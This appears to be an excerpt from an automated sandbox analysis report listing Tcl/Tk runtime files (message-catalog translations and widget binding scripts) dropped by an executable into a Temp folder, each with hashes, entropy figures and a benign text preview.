                                                                                                                                                                                                                                                    Preview:namespace eval ::tk {. ::msgcat::mcset es "&Abort" "&Abortar". ::msgcat::mcset es "&About..." "&Acerca de ...". ::msgcat::mcset es "All Files" "Todos los archivos" . ::msgcat::mcset es "Application Error" "Error de la aplicaci\u00f3n". ::msgcat::mcset es "&Blue" "&Azul". ::msgcat::mcset es "&Cancel" "&Cancelar". ::msgcat::mcset es "Cannot change to the directory \"%1\$s\".\nPermission denied." "No es posible acceder al directorio \"%1\$s\".\nPermiso denegado.". ::msgcat::mcset es "Choose Directory" "Elegir directorio". ::msgcat::mcset es "Cl&ear" "&Borrar". ::msgcat::mcset es "&Clear Console" "&Borrar consola". ::msgcat::mcset es "Color" "Color". ::msgcat::mcset es "Console" "Consola". ::msgcat::mcset es "&Copy" "&Copiar". ::msgcat::mcset es "Cu&t" "Cor&tar". ::msgcat::mcset es "&Delete" "&Borrar". ::msgcat::mcset es "Details >>" "Detalles >>". ::msgcat::mcset es "Directory \"%1\$s\" does not exist." "El directorio \"%1\$s\" no existe.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):3727
                                                                                                                                                                                                                                                    Entropy (8bit):4.582588432323347
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:fkErYNxfhFBqFHjApxKSOzbgRujzSAEFlBGr3jd:fkErYLpaV0KSHtXcN
                                                                                                                                                                                                                                                    MD5:2C904D110BA900583A86838AE264438C
                                                                                                                                                                                                                                                    SHA1:CC7C444BDA43FD5EBE0B00F68BAD42E7DFB816C2
                                                                                                                                                                                                                                                    SHA-256:E7BA2F7A95679695504164C92B86B92AB5F7D08DCF34029E391C1683AC9FF5F3
                                                                                                                                                                                                                                                    SHA-512:B6FBB18C061EC990BCD3120D80A0A5794B4935FFF9EE6CBF5FD231BFD0C0F1772620E11877C91D34F7FA8C5FEE71BD15C3330017C437F4DE66751D97D8BB7208
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:namespace eval ::tk {. ::msgcat::mcset fr "&Abort" "&Annuler". ::msgcat::mcset fr "About..." "\u00c0 propos...". ::msgcat::mcset fr "All Files" "Tous les fichiers". ::msgcat::mcset fr "Application Error" "Erreur d'application". ::msgcat::mcset fr "&Blue" "&Bleu". ::msgcat::mcset fr "&Cancel" "&Annuler". ::msgcat::mcset fr "Cannot change to the directory \"%1\$s\".\nPermission denied." "Impossible d'acc\u00e9der au r\u00e9pertoire \"%1\$s\".\nPermission refus\u00e9e.". ::msgcat::mcset fr "Choose Directory" "Choisir r\u00e9pertoire". ::msgcat::mcset fr "Clear" "Effacer". ::msgcat::mcset fr "Color" "Couleur". ::msgcat::mcset fr "Console". ::msgcat::mcset fr "Copy" "Copier". ::msgcat::mcset fr "Cut" "Couper". ::msgcat::mcset fr "Delete" "Effacer". ::msgcat::mcset fr "Details >>" "D\u00e9tails >>". ::msgcat::mcset fr "Directory \"%1\$s\" does not exist." "Le r\u00e9pertoire \"%1\$s\" n'existe pas.". ::msgcat::mcset fr "&Directory:" "&R\u00e
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):4588
                                                                                                                                                                                                                                                    Entropy (8bit):4.764869147275923
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:GwCzxSy0Kt9C81m/HSzVqUaJf9q/x5a/mETsN:G31RCx/4vZM+EA
                                                                                                                                                                                                                                                    MD5:7045E373D8E5A7D379AF004C5616313B
                                                                                                                                                                                                                                                    SHA1:16D7B17FBF71234989BF356655D6D43C271A020F
                                                                                                                                                                                                                                                    SHA-256:76453FEC72C59FD85648036B5B9FC983D7279CEC5818295E0451CF83CF7D264F
                                                                                                                                                                                                                                                    SHA-512:F260A7D61E17ECDF52F6C36E4BBA3F881079490CDB3DCA380CE34D0012B98F9FA96550557BC6BCE267594CCD9BB63A94F45C329B25FF66144223833A5A79EB0D
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:namespace eval ::tk {. ::msgcat::mcset hu "&Abort" "&Megszak\u00edt\u00e1s". ::msgcat::mcset hu "About..." "N\u00e9vjegy...". ::msgcat::mcset hu "All Files" "Minden f\u00e1jl". ::msgcat::mcset hu "All Files (*) " "Minden f\u00e1jl (*) ". ::msgcat::mcset hu "Application Error" "Alkalmaz\u00e1s hiba". ::msgcat::mcset hu "&Blue" "&K\u00e9k". ::msgcat::mcset hu "&Cancel" "M\u00e9g&sem". ::msgcat::mcset hu "Cannot change to the directory \"%1\$s\".\nPermission denied." "A k\u00f6nyvt\u00e1rv\u00e1lt\u00e1s nem siker\u00fclt: \"%1\$s\".\nHozz\u00e1f\u00e9r\u00e9s megtagadva.". ::msgcat::mcset hu "Choose Directory" "K\u00f6nyvt\u00e1r kiv\u00e1laszt\u00e1sa". ::msgcat::mcset hu "Clear" "T\u00f6rl\u00e9s". ::msgcat::mcset hu "&Clear Console" "&T\u00f6rl\u00e9s Konzol". ::msgcat::mcset hu "Color" "Sz\u00edn". ::msgcat::mcset hu "Console" "Konzol". ::msgcat::mcset hu "&Copy" "&M\u00e1sol\u00e1s". ::msgcat::mcset hu "Cu&t" "&Kiv\u00e1g\u00e1s". ::ms
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):3557
                                                                                                                                                                                                                                                    Entropy (8bit):4.44160619394425
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:rpcxYo3XRzvjbhWsHTTYTxDllvOr80nC2dnGHc839kUqg:9caodbhlHYTxDlcY0HpVg
                                                                                                                                                                                                                                                    MD5:4396605B50C75E6F7FA1C3FBD6A42799
                                                                                                                                                                                                                                                    SHA1:5ABC6C66208FF596F49A7C576EBB30D0773F1EA0
                                                                                                                                                                                                                                                    SHA-256:2E0FA36F75B191A2FEE3331EC0215A68DD913D62C2680555C21008286150A58F
                                                                                                                                                                                                                                                    SHA-512:74A25EE87C2E8AD6B37BA5B17CA4B31474D71E953E7E896AF90CCC6A49CA48F503D93771A8FB947351ECEDCC40A4B1EDDE01E278442195235105C617DC8F3CA1
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:namespace eval ::tk {. ::msgcat::mcset it "&Abort" "&Interrompi". ::msgcat::mcset it "About..." "Informazioni...". ::msgcat::mcset it "All Files" "Tutti i file". ::msgcat::mcset it "Application Error" "Errore dell' applicazione". ::msgcat::mcset it "&Blue" "&Blu". ::msgcat::mcset it "&Cancel" "&Annulla". ::msgcat::mcset it "Cannot change to the directory \"%1\$s\".\nPermission denied." "Impossibile accedere alla directory \"%1\$s\".\nPermesso negato.". ::msgcat::mcset it "Choose Directory" "Scegli una directory". ::msgcat::mcset it "Clear" "Azzera". ::msgcat::mcset it "Color" "Colore". ::msgcat::mcset it "Console". ::msgcat::mcset it "Copy" "Copia". ::msgcat::mcset it "Cut" "Taglia". ::msgcat::mcset it "Delete" "Cancella". ::msgcat::mcset it "Details >>" "Dettagli >>". ::msgcat::mcset it "Directory \"%1\$s\" does not exist." "La directory \"%1\$s\" non esiste.". ::msgcat::mcset it "&Directory:". ::msgcat::mcset it "Error: %1\$s" "Er
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7095
                                                                                                                                                                                                                                                    Entropy (8bit):4.65919646196926
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:/TTnlMN3O70KFuQbL/Zs4g0GcNhHOx/bRHsa1EHL3YRYt:SRh3ILhsKQuLjt
                                                                                                                                                                                                                                                    MD5:072E12F026647B15649ADB045847A5C2
                                                                                                                                                                                                                                                    SHA1:1840B96A80AC1506B0510679EAB56FD799E7DCE1
                                                                                                                                                                                                                                                    SHA-256:245A493CC77648861F3629286BDA153E2B6BF0E2499BB321FA7B18951F05BB7C
                                                                                                                                                                                                                                                    SHA-512:D0E996662146BA431FDDE8DDD0DCC415240BAE2D66FB698AABBB6F40E9CC6B2E5298351B12BCBB187310A0F4B8B80B1BF84FFE186C9191334C66E71B2CB161E4
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:namespace eval ::tk {. ::msgcat::mcset nl "\"%1\$s\" must be an absolute pathname" "\"%1\$s\" moet een absolute pad-naam zijn". ::msgcat::mcset nl "%1\$s is not a toplevel window" "%1\$s is geen toplevel window". ::msgcat::mcset nl ", or" ", of". ::msgcat::mcset nl "-default, -icon, -message, -parent, -title, or -type" "-default, -icon, -message, -parent, -title, of -type". ::msgcat::mcset nl "-initialdir, -mustexist, -parent, or -title" "-initialdir, -mustexist, -parent, of -title". ::msgcat::mcset nl "&Abort" "&Afbreken". ::msgcat::mcset nl "About..." "Over...". ::msgcat::mcset nl "All Files" "Alle Bestanden". ::msgcat::mcset nl "Application Error" "Toepassingsfout". ::msgcat::mcset nl "&Blue" "&Blauw". ::msgcat::mcset nl "&Cancel" "&Annuleren". ::msgcat::mcset nl "Cannot change to the directory \"%1\$s\".\nPermission denied." "Kan niet naar map \"%1\$s\" gaan.\nU heeft hiervoor geen toestemming.". ::msgcat::mcset nl "Choose Directory" "Kies map
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):3952
                                                                                                                                                                                                                                                    Entropy (8bit):4.771874654651666
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:mYkv1H+BBv5vVXnjB+y7oBUHHE3XQrDool2EQdWa0ybBhKG:zsH+3vLNnZHHE3XjoFYhL
                                                                                                                                                                                                                                                    MD5:E28545F6A7B22EC237AE53C8F12A83C8
                                                                                                                                                                                                                                                    SHA1:0BF3A4827B93D63934A099F935A484B9E101168E
                                                                                                                                                                                                                                                    SHA-256:84F6D2498AA1438706BD9665918754275BE7FA0099CFB8A8601AE1F79915C6F0
                                                                                                                                                                                                                                                    SHA-512:0B1FDE2B6412162361041745E288902800D72E6B1B0606B362047F0E7C9A39459660F6BB9AEA35D4CED7F225158BB0A944C2D81F731169253F6B456C9EFFFB49
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:namespace eval ::tk {. ::msgcat::mcset pl "&Abort" "&Przerwij". ::msgcat::mcset pl "&About..." "O programie...". ::msgcat::mcset pl "All Files" "Wszystkie pliki". ::msgcat::mcset pl "Application Error" "B\u0142\u0105d w programie". ::msgcat::mcset pl "&Blue" "&Niebieski". ::msgcat::mcset pl "&Cancel" "&Anuluj". ::msgcat::mcset pl "Cannot change to the directory \"%1\$s\".\nPermission denied." "Nie mo\u017cna otworzy\u0107 katalogu \"%1\$s\".\nOdmowa dost\u0119pu.". ::msgcat::mcset pl "Choose Directory" "Wybierz katalog". ::msgcat::mcset pl "Cl&ear" "&Wyczy\u015b\u0107". ::msgcat::mcset pl "&Clear Console" "&Wyczy\u015b\u0107 konsol\u0119". ::msgcat::mcset pl "Color" "Kolor". ::msgcat::mcset pl "Console" "Konsola". ::msgcat::mcset pl "&Copy" "&Kopiuj". ::msgcat::mcset pl "Cu&t" "&Wytnij". ::msgcat::mcset pl "&Delete" "&Usu\u0144". ::msgcat::mcset pl "Details >>" "Szczeg\u00f3\u0142y >>". ::msgcat::mcset pl "Directory \"%1\$s\" does not
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):3973
                                                                                                                                                                                                                                                    Entropy (8bit):4.677862734107109
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:YmBmHHCnBbrvRjfgxtilIUkQIPlYwCC4x+hrmK1VZi:YmAncxVMtiXkPl2xomUQ
                                                                                                                                                                                                                                                    MD5:1F04930642B3F4A9F16F11CC674B56A7
                                                                                                                                                                                                                                                    SHA1:1AF829DD0A4175AF35DED50F530B4285F7A174FB
                                                                                                                                                                                                                                                    SHA-256:611FE4FEB0FB3A8D7BADA328B6AF65C5BE9704DF334BCCD55B5E736EAA0A898F
                                                                                                                                                                                                                                                    SHA-512:BCA4FF7F102C9AEE0BB306C5E8A34290AB7D3C7D9948809B8F31064BA5F20A7DE9EAE2D61201E602136A27B24BAEFB2C950F04AA766DA46C6025E79B1AF86DC3
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:namespace eval ::tk {. ::msgcat::mcset pt_br "&Abort" "&Abortar". ::msgcat::mcset pt_br "About..." "Sobre ...". ::msgcat::mcset pt_br "All Files" "Todos os arquivos". ::msgcat::mcset pt_br "Application Error" "Erro de aplica\u00e7\u00e3o". ::msgcat::mcset pt_br "&Blue" "&Azul". ::msgcat::mcset pt_br "&Cancel" "&Cancelar". ::msgcat::mcset pt_br "Cannot change to the directory \"%1\$s\".\nPermission denied." "N\u00e3o foi poss\u00edvel mudar para o diret\u00f3rio \"%1\$s\".\nPermiss\u00e3o negada.". ::msgcat::mcset pt_br "Choose Directory" "Escolha um diret\u00f3rio". ::msgcat::mcset pt_br "Clear" "Apagar". ::msgcat::mcset pt_br "Color" "Cor". ::msgcat::mcset pt_br "Console" "Console". ::msgcat::mcset pt_br "Copy" "Copiar". ::msgcat::mcset pt_br "Cut" "Recortar". ::msgcat::mcset pt_br "Delete" "Excluir". ::msgcat::mcset pt_br "Details >>" "Detalhes >>". ::msgcat::mcset pt_br "Directory \"%1\$s\" does not exist." "O diret\u00f3rio \"%1\$s\"
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7105
                                                                                                                                                                                                                                                    Entropy (8bit):4.353661356769555
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:NUEBGhT4YsVL3L7Pkhx2xSrw02lOzFAnxS/j49cD/qRjGSQvN8Nfo5hgV9aoTRZ/:grAPJGF8mq+WRKOGcRmRu
                                                                                                                                                                                                                                                    MD5:202DC42C5DA0F0ACA88B1B4C30E5381B
                                                                                                                                                                                                                                                    SHA1:9A7CC7AFBDF37C7937589E7F212ABC6E3F260D55
                                                                                                                                                                                                                                                    SHA-256:45369C1C8853EE34C5B65C742C6AC3E03E1399E64C0958B5E4E4A927E8D30310
                                                                                                                                                                                                                                                    SHA-512:DE6C9601010A51AAB380FD353849D91F47FFE9087DE524DA2DEBA30FF63EDF8C83FE471F8B9D733576B9732ABD881CD1D411BB1A04A0EC25CE8CFE08716C597E
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:namespace eval ::tk {. ::msgcat::mcset ru "&Abort" "&\u041e\u0442\u043c\u0435\u043d\u0438\u0442\u044c". ::msgcat::mcset ru "About..." "\u041f\u0440\u043e...". ::msgcat::mcset ru "All Files" "\u0412\u0441\u0435 \u0444\u0430\u0439\u043b\u044b". ::msgcat::mcset ru "Application Error" "\u041e\u0448\u0438\u0431\u043a\u0430 \u0432 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0435". ::msgcat::mcset ru "&Blue" " &\u0413\u043e\u043b\u0443\u0431\u043e\u0439". ::msgcat::mcset ru "&Cancel" "\u041e\u0442&\u043c\u0435\u043d\u0430". ::msgcat::mcset ru "Cannot change to the directory \"%1\$s\".\nPermission denied." \...."\u041d\u0435 \u043c\u043e\u0433\u0443 \u043f\u0435\u0440\u0435\u0439\u0442\u0438 \u0432 \u043a\u0430\u0442\u0430\u043b\u043e\u0433 \"%1\$s\".\n\u041d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u043f\u0440\u0430\u0432 \u0434\u043e\u0441\u0442\u0443\u043f\u0430". ::msgcat::mcset ru "Choose Directory" "\u0412\u044b\u0431\u0435\u0440\u0
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):3762
                                                                                                                                                                                                                                                    Entropy (8bit):4.613765855030883
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:namespace eval ::tk {. ::msgcat::mcset sv "&Abort" "&Avsluta". ::msgcat::mcset sv "&About..." "&Om...". ::msgcat::mcset sv "All Files" "Samtliga filer". ::msgcat::mcset sv "Application Error" "Programfel". ::msgcat::mcset sv "&Blue" "&Bl\u00e5". ::msgcat::mcset sv "&Cancel" "&Avbryt". ::msgcat::mcset sv "Cannot change to the directory \"%1\$s\".\nPermission denied." "Kan ej n\u00e5 mappen \"%1\$s\".\nSaknar r\u00e4ttigheter.". ::msgcat::mcset sv "Choose Directory" "V\u00e4lj mapp". ::msgcat::mcset sv "&Clear" "&Radera". ::msgcat::mcset sv "&Clear Console" "&Radera konsollen". ::msgcat::mcset sv "Color" "F\u00e4rg". ::msgcat::mcset sv "Console" "Konsoll". ::msgcat::mcset sv "&Copy" "&Kopiera". ::msgcat::mcset sv "Cu&t" "Klipp u&t". ::msgcat::mcset sv "&Delete" "&Radera". ::msgcat::mcset sv "Details >>" "Detaljer >>". ::msgcat::mcset sv "Directory \"%1\$s\" does not exist." "Mappen \"%1\$s\" finns ej.". ::msgcat::mcset sv "&Directory:
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):5594
                                                                                                                                                                                                                                                    Entropy (8bit):4.9941618573215525
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# obsolete.tcl --.#.# This file contains obsolete procedures that people really shouldn't.# be using anymore, but which are kept around for backward compatibility..#.# Copyright (c) 1994 The Regents of the University of California..# Copyright (c) 1994 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..# The procedures below are here strictly for backward compatibility with.# Tk version 3.6 and earlier. The procedures are no longer needed, so.# they are no-ops. You should not use these procedures anymore, since.# they may be removed in some future release...proc tk_menuBar args {}.proc tk_bindForTraversal args {}..# ::tk::classic::restore --.#.# Restore the pre-8.5 (Tk classic) look as the widget defaults for classic.# Tk widgets..#.# The value following an 'option add' call is the new 8.5 value..#.namespace eval ::tk::classic {. # This may need to be adjusted for some windo
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1586
                                                                                                                                                                                                                                                    Entropy (8bit):4.733749898743743
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# optMenu.tcl --.#.# This file defines the procedure tk_optionMenu, which creates.# an option button and its associated menu..#.# Copyright (c) 1994 The Regents of the University of California..# Copyright (c) 1994 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..# ::tk_optionMenu --.# This procedure creates an option button named $w and an associated.# menu. Together they provide the functionality of Motif option menus:.# they can be used to select one of many values, and the current value.# appears in the global variable varName, as well as in the text of.# the option menubutton. The name of the menu is returned as the.# procedure's result, so that the caller can use it to change configuration.# options on the menu or otherwise manipulate it..#.# Arguments:.# w -...The name to use for the menubutton..# varName -..Global variable to hold the currently selected value..# first
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7869
                                                                                                                                                                                                                                                    Entropy (8bit):4.892883872925194
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# palette.tcl --.#.# This file contains procedures that change the color palette used.# by Tk..#.# Copyright (c) 1995-1997 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..# ::tk_setPalette --.# Changes the default color scheme for a Tk application by setting.# default colors in the option database and by modifying all of the.# color options for existing widgets that have the default value..#.# Arguments:.# The arguments consist of either a single color name, which.# will be used as the new background color (all other colors will.# be computed from this) or an even number of values consisting of.# option names and values. The name for an option is the one used.# for the option database, such as activeForeground, not -activeforeground...proc ::tk_setPalette {args} {. if {[winfo depth .] == 1} {..# Just return on monochrome displays, otherwise errors will occur..return. }.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):5176
                                                                                                                                                                                                                                                    Entropy (8bit):4.933519639131517
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# panedwindow.tcl --.#.# This file defines the default bindings for Tk panedwindow widgets and.# provides procedures that help in implementing those bindings...bind Panedwindow <Button-1> { ::tk::panedwindow::MarkSash %W %x %y 1 }.bind Panedwindow <Button-2> { ::tk::panedwindow::MarkSash %W %x %y 0 }..bind Panedwindow <B1-Motion> { ::tk::panedwindow::DragSash %W %x %y 1 }.bind Panedwindow <B2-Motion> { ::tk::panedwindow::DragSash %W %x %y 0 }..bind Panedwindow <ButtonRelease-1> {::tk::panedwindow::ReleaseSash %W 1}.bind Panedwindow <ButtonRelease-2> {::tk::panedwindow::ReleaseSash %W 0}..bind Panedwindow <Motion> { ::tk::panedwindow::Motion %W %x %y }..bind Panedwindow <Leave> { ::tk::panedwindow::Leave %W }..# Initialize namespace.namespace eval ::tk::panedwindow {}..# ::tk::panedwindow::MarkSash --.#.# Handle marking the correct sash for possible dragging.#.# Arguments:.# w..the widget.# x..widget local x coord.# y..widget local y coord.# proxy.whether this should be a prox
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):371
                                                                                                                                                                                                                                                    Entropy (8bit):5.040568626710524
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:if {[catch {package present Tcl 8.5.0}]} { return }..if {($::tcl_platform(platform) eq "unix") && ([info exists ::env(DISPLAY)]...|| ([info exists ::argv] && ("-display" in $::argv)))} {.. package ifneeded Tk 8.5.19 [list load [file join $dir .. .. bin libtk8.5.dll] Tk]..} else {.. package ifneeded Tk 8.5.19 [list load [file join $dir .. .. bin tk85.dll] Tk]..}..
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:Tcl script, ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7265
                                                                                                                                                                                                                                                    Entropy (8bit):4.8155351114904965
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# safetk.tcl --.#.# Support procs to use Tk in safe interpreters..#.# Copyright (c) 1997 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES...# see safetk.n for documentation..#.#.# Note: It is now ok to let untrusted code being executed.# between the creation of the interp and the actual loading.# of Tk in that interp because the C side Tk_Init will.# now look up the master interp and ask its safe::TkInit.# for the actual parameters to use for it's initialization (if allowed),.# not relying on the slave state..#..# We use opt (optional arguments parsing).package require opt 0.4.1;..namespace eval ::safe {.. # counter for safe toplevels. variable tkSafeId 0.}..#.# tkInterpInit : prepare the slave interpreter for tk loading.# most of the real job is done by loadTk.# returns the slave name (tkInterpInit does).#.proc ::safe::tkInterpIni
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7735
                                                                                                                                                                                                                                                    Entropy (8bit):4.926487320842871
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# scale.tcl --.#.# This file defines the default bindings for Tk scale widgets and provides.# procedures that help in implementing the bindings..#.# Copyright (c) 1994 The Regents of the University of California..# Copyright (c) 1994-1995 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..#-------------------------------------------------------------------------.# The code below creates the default class bindings for entries..#-------------------------------------------------------------------------..# Standard Motif bindings:..bind Scale <Enter> {. if {$tk_strictMotif} {..set tk::Priv(activeBg) [%W cget -activebackground]..%W configure -activebackground [%W cget -background]. }. tk::ScaleActivate %W %x %y.}.bind Scale <Motion> {. tk::ScaleActivate %W %x %y.}.bind Scale <Leave> {. if {$tk_strictMotif} {..%W configure -activebackground $tk::Priv(activeBg). }.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):12235
                                                                                                                                                                                                                                                    Entropy (8bit):5.000424244081932
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# scrlbar.tcl --.#.# This file defines the default bindings for Tk scrollbar widgets..# It also provides procedures that help in implementing the bindings..#.# Copyright (c) 1994 The Regents of the University of California..# Copyright (c) 1994-1996 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..#-------------------------------------------------------------------------.# The code below creates the default class bindings for scrollbars..#-------------------------------------------------------------------------..# Standard Motif bindings:.if {[tk windowingsystem] eq "x11" || [tk windowingsystem] eq "aqua"} {..bind Scrollbar <Enter> {. if {$tk_strictMotif} {..set tk::Priv(activeBg) [%W cget -activebackground]..%W configure -activebackground [%W cget -background]. }. %W activate [%W identify %x %y].}.bind Scrollbar <Motion> {. %W activate [%W identify %x %y].}..# The
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):15087
                                                                                                                                                                                                                                                    Entropy (8bit):5.016543299113458
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
